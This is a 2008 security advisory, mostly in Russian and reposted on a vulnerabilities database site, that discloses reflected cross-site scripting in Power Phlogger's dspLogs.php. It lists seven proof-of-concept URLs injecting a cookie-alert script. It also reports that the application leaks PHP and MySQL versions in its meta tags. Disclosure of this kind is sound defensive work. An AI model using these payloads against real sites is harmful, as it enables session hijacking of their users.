Security Advisory: Vulnerabilities in Power Phlogger - security vulnerabilities database

[EN] securityvulns.ru
no-pyccku

Related information
  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
  joomla (k12.
tr)(com_iomez
un)SQL Injection
  joomll(k12.
tr)(com_mezun
)SQL Injection
  joomla (k12.
tr)(com_iomez
un)SQL Injection
  Kommentare zum Download script SQL Injection

From: MustLive <mustlive_(at)_websecurity.com.ua>
Date: 12.02.2008
Subject: Vulnerabilities in Power Phlogger

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Cross-Site Scripting и Information disclosure
уязвимостях в Power Phlogger.

XSS:

В скрипте dspLogs.php.

http://site/dspLogs.
php?S_hostname=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/dspLogs.
php?S_referer=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/dspLogs.
php?S_agent=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/dspLogs.
php?S_res=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/dspLogs.
php?S_color=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/dspLogs.
php?S_online=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

http://site/dspLogs.
php?S_mp=%22%3E%3Cscript%3Ealert(document.
cookie)%3C/script%3E

Information disclosure:

На странице http://site/index.php (как и на других страницах приложения) выводится
важная информация о системе (версии PHP и MySQL, как и версия веб сервера с его
банера) в мета-тегах.

<meta name="PHP Version" content="..." />
<meta name="MYSQL Version" content="..." />

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/1824/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua